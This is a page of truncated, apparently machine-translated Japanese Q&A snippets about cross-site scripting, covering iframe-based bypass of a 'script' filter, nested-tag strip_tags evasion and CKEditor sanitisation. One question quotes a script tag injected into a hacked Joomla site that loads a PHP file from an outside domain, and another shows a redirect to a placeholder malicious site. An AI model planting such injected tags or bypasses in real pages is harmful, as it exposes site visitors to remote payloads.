xss

    7

    4答えて

    私はクロスサイトスクリプティングを試しています。私は、ユーザーがコメントを挿入してウェブサイトで見ることを可能にするウェブサイトを持っています。コメントから文字列「スクリプト」をフィルタリングしますが、iframeを許可します。私が作ったウェブサイトを指し示すiframeを埋め込むことができ、私が望むスクリプトを実行できることを理解しています。私の質問です:私のiframeスクリプトは元のウェブサ

    3

    1答えて

    私がしようとしているのは、RESTfulサービスへの簡単なクロスサイトクライアント呼び出しを実装することです。 今、私はこの目的のためにeasyXDMを使用しようとしています。 GET /?xdm_e=http%3A%2F%2Flocalhost%3A8081&xdm_c=default4817&xdm_p=1 HTTP/1.1 Host: localhost:8080 Connection:

    46

    5答えて

    私はこの記事を非常に多くのコーディング関連として掲示したいと思っていました。今週私の会社の古いASP(クラシック)サイトでこの週を整理しなければならなかったものでした。 数日前に実行されたSQLインジェクション攻撃でヒットしましたが、これらのSQLクエリーを使用してSQL Serverに「ダメージ」があったのは私の頭を傷つけています。 正直言って、これは非常に独創的な方法で実行されていると思ってい

    0

    1答えて

    私のJoomla! (どこか)1.5のWebサイトは最近、XSS攻撃(それはこのようなものになると私はnoobのだ)であると思われるものの犠牲になった...次のコードは、サイト内に注入した <script src="http://sweepstakesandcontestsdo.com/pmg.php"></script> およびI」正確にはわからない。私はデータベースとファイルを検索して、結

    -1

    1答えて

    私はmod_wsgiでApache Webサーバーのすべての要求をキャプチャする必要があります。 GETリクエストの攻撃をチェックします。

    1

    2答えて

    標準データベースではなく、XML形式でサーベイデータを保存するWebアプリケーションがあります。サードパーティの調査コンポーネントを使用します(実際にはthis componentですが、一部の機能を追加するように変更されています) 現在、私たちは非常に限定的なホワイトリスト検証アプローチを使用して、 XMLファイル。しかし、ホワイトリストのルールは、お客様のサポートの問題に変わりつつあります。彼

    0

    1答えて

    CKEditorを使用してXSSからプロジェクトを保護するにはどうすればよいですか?良いPHP BBCode Parser(少なくとも私は1つを見つけることができません)がないので、XSSを防ぐためにCKEditorから入ってくる文字列を検証するために何をすべきですか?あるいは、CKEditorのBBCodeからevereythingを解析するBBCode用のGOOD PHPパーサーがありますか?

    3

    2答えて

    埋め込まれたタグを処理し、どのようなstrip_tagsの結果(思っていた: 「< SCR <H1>を>警告IPT( 'オハイオ州オハイオ州 ')</SCR </H1 > " それが戻ってくる: " > IPT <スクリプト>警告(' オハイオ州オハイオ州 ')< /スクリプト>」(すなわち明白なタグを除去することによって、それが露出することを認識しません新しいもの) または "アラート( 'oh

    0

    1答えて

    jQueryを使用してWebサーバーと通信するHTML/Javascriptアプリケーションがあります(これは制御しません)。私はローカルファイル(file:///app.html)から実行し、これはSafariで正常に動作します。しかし、それはFirefoxで失敗し、私はすべてのXHRリクエストがOPTIONリクエストに変換されているのを見ています。どうやら、クロスサイトスクリプティングルールに

    1

    2答えて

    以下は理論的な質問です。誰かが答えを提供できることを願っています。 私は少しを探求し、次は非常に(危険な)ことが可能であることを発見しました: $('#link').click(function() { window.location = 'http://www.malicious-example.com'; return false; }); As seen in th